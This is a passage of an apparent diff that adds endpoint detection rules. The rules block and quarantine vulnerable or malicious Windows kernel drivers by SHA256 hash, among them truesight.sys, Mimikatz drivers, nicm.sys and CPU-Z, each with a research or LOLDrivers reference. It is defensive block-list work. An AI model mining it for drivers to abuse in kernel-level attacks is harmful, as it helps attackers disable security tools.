"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148295Z", + "creation_date": "2026-03-23T11:45:31.148296Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148302Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c8a092df8fa7012c64769563307b8c39447da1470e6f3b4a324ff98b7549433d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d38d6bc-d7fe-5e7a-bb9c-b92d068c0100", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456537Z", + "creation_date": "2026-03-23T11:45:30.456540Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456549Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"d3e95b8d8cbb0c4c3bb78d929408b37fd3b8f305b6234f7f03954465d52454eb", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d3db35e-3ec0-535a-a73f-7e86823ed1a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831127Z", + "creation_date": "2026-03-23T11:45:30.831129Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831135Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cbba49d8b079613d8fe81944224fcc6e52e71a1eca54cd94ebbf891c091f5ea0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d3fb3ab-1a3d-58d2-9085-d8a25ec9a96a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146618Z", + "creation_date": "2026-03-23T11:45:31.146620Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146626Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0fb37657d0f6eb3968be2049eb3135614e33a7b5354f0fa19938b4e07389236a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d628084-850c-5abe-a1d8-03dda5a56313", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498361Z", + "creation_date": "2026-03-23T11:45:31.498364Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498373Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ecc3bf10c95d05622f596ec6f6ca85af85e5dd9c1ab5442052856dbbd62e774", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d6b7f94-66e3-5745-9abd-541b3c5a2ca8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452828Z", + "creation_date": "2026-03-23T11:45:30.452832Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452841Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18f306b6edcfacd33b7b244eaecdd0986ef342f0d381158844d1f0ee1ac5c8d7", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d7b1d3c-3ddf-5138-ba70-299e21b66c0d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153396Z", + "creation_date": "2026-03-23T11:45:31.153399Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153408Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89ea6406a18fadbe53c31e678a9bcb6648e6e1b1c11eae319df5d4ee45b7cfc6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d7edbf3-734e-5d9c-a3ad-46ed539d8418", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970781Z", + "creation_date": "2026-03-23T11:45:29.970785Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970794Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "68191d76aaafb52bbec5240c3b371e7dd77ff442b4a3394b41cc402402b43717", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d7f11c3-249d-5775-b0ba-0028d6fb8d1d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 
10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811381Z", + "creation_date": "2026-03-23T11:45:31.811383Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811388Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f1aa668d4a014e08274931a73971c03a27af624936b553df615a52069b6815a1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d7fb28a-52a0-5a96-a924-2b2ffef570bd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822582Z", + "creation_date": "2026-03-23T11:45:30.822584Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822589Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, 
+ "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d16e1f28bae42b72cad2b1511ec59968d0659a6913cce8056b4572c20303822", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d894dd5-4a98-5f72-bccb-0d63bd8c07c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159750Z", + "creation_date": "2026-03-23T11:45:31.159752Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159758Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d56f5b795bb2212a7e09393a8cc0bd86f51241e6fa274179949bfb0ccde0f05", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d8c63e2-5b6c-53aa-8ad1-92a37767214f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835842Z", + "creation_date": "2026-03-23T11:45:30.835844Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835849Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "12329b9ab6f14b2ad6cb37e76d6f74e14e5790e829035704ea0f5c7a5751e764", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d94af5a-6404-55d4-918f-f5f7f39e8cfa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978579Z", + "creation_date": "2026-03-23T11:45:29.978581Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978587Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34b3acdeac5002880071f73b70aa3abd3a6facb9e281b5c93cc82a7a8a6d5cc1", + "comment": 
"Vulnerable Kernel Driver (aka IOMap64.sys) [https://www.loldrivers.io/drivers/f4990bdd-8821-4a3c-a11a-4651e645810c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d9869e2-a925-5ae3-ab47-56662313bb33", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483532Z", + "creation_date": "2026-03-23T11:45:31.483536Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483546Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8a6d9f7c20e86d18f329b378991299ff94b7635adf9823bd8ca87eb29010b32c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9da6db87-b3c7-5459-bb02-095f21cb193e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.810127Z", + "creation_date": "2026-03-23T11:45:31.810131Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810139Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1480fbab723741589d56bc33add490b8b8753b8bfe54db0c13672d4046e22c1c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9dafdc92-6f3a-5b62-80ec-afae3354709e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462257Z", + "creation_date": "2026-03-23T11:45:30.462260Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462269Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "184cc3969b79f1856614bed64c1d5562d3363e13a92176f2e9a9235a4aa7d051", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 
"id": "9db59f1b-54e0-586c-a1f2-096d89760999", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145566Z", + "creation_date": "2026-03-23T11:45:32.145568Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145574Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3df5f17da8758288b633611afc1c0b6d42c1e56aed5539cfa313986f70ce90e7", + "comment": "Vulnerable Kernel Driver (aka ADRMDRVSYS.sys) [https://www.loldrivers.io/drivers/48aeea9b-7812-4b25-9835-baaebe7dc551/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9dbdcbec-ae5b-570f-934a-a202e35a69ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476524Z", + "creation_date": "2026-03-23T11:45:30.476527Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.476537Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b756d234559ee0ed93328bb598352ead2efb27eabaf1afac5fb3e2f43b9901f3", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9de54a6d-8837-5d73-9395-dfd72ed199fe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154210Z", + "creation_date": "2026-03-23T11:45:31.154213Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154218Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1454ead1d04577ee7332b820fa6d15bb0d3c4f676bc1a15eb9fc823dc7e00e03", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9de9d2e6-4a5a-5ad5-bce5-6317d08fe845", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146474Z", + "creation_date": "2026-03-23T11:45:32.146477Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146486Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "54942b92790dc0b84c56d4a00f3ac419b0a506344ca7e9f1fb666a86dbc4117f", + "comment": "Malicious Kernel Driver (aka f.sys) [https://www.loldrivers.io/drivers/17a1ad58-ecf3-4dea-b1ca-336880d15256/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9df71d7f-9dc2-5088-97a6-20f710b6f54a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142398Z", + "creation_date": "2026-03-23T11:45:31.142400Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142406Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d447654a04902b223620e9a5f1247c1c780c37ab0055ea673973b9c93a1a798d", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e01a289-c3db-5125-b41b-3e4677fa8189", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490048Z", + "creation_date": "2026-03-23T11:45:31.490051Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490056Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c09d3f977a422a4da35bc8c0c8843618b36fd24fda467a4c9b818099f6f291fe", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e041b33-1bab-5873-b467-daf187c764ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142203Z", + "creation_date": "2026-03-23T11:45:31.142205Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142210Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f8da066754639522b60aa827389dfdc363899c56a0260ac2fb61f053db4333f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e0c86be-5196-56b4-866b-5b28cf106569", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149897Z", + "creation_date": "2026-03-23T11:45:31.149899Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149905Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "af91b7c87833cf8af531708e945e04061c8eeda1d3115c6458ff82c5cc4d1d09", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e1396ef-4013-5f65-81c0-47e756c048a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610335Z", + "creation_date": "2026-03-23T11:45:29.610337Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610343Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a6db9facf9e13d35c37dd468be04bae5f70c6127a9aee76daebddbdec95d486", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] 